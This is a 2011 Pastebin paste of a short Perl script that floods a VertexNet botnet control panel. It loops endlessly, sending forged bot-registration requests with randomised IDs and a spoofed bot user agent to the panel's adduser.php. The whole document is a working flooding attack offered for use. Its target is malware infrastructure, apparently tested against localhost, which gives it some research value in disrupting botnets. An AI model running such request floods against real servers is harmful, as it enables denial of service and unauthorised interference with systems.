Advertisement
Xylitol

VertexNet v1.1.1 Flood Bots

May 15th, 2011
2,438
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 0.70 KB | None | 0 0
  1. #!/usr/bin/perl
  2. # VertexNet v1.1.1 Flood Bots
  3. # http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
  4. # Xyl2k! :รพ
  5.  
  6. use HTTP::Request;
  7. use LWP::UserAgent;
  8.  
  9. $URL = "http://localhost/Panel/adduser.php";
  10.  
  11. $useragent = LWP::UserAgent -> new();
  12. $useragent -> agent('V32');
  13.  
  14. $try = 0;
  15.  
  16.     while(1)
  17.     {
  18.         $rnd = rand();
  19.        
  20.         $request = HTTP::Request -> new(GET => $URL . '?uid={' . $rnd . '}&lan=127.0.0.1&cmpname=Xyl2k!&country=Fran.ais%20(France)%20+33&cc=FR&idle=0&ver=v1337');
  21.         $response = $useragent -> request($request);
  22.    
  23.         if ($response -> is_success)
  24.         {
  25.                 $try++;
  26.                 print("[~] The fire day " . $try . "\n");
  27.         }
  28.     }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement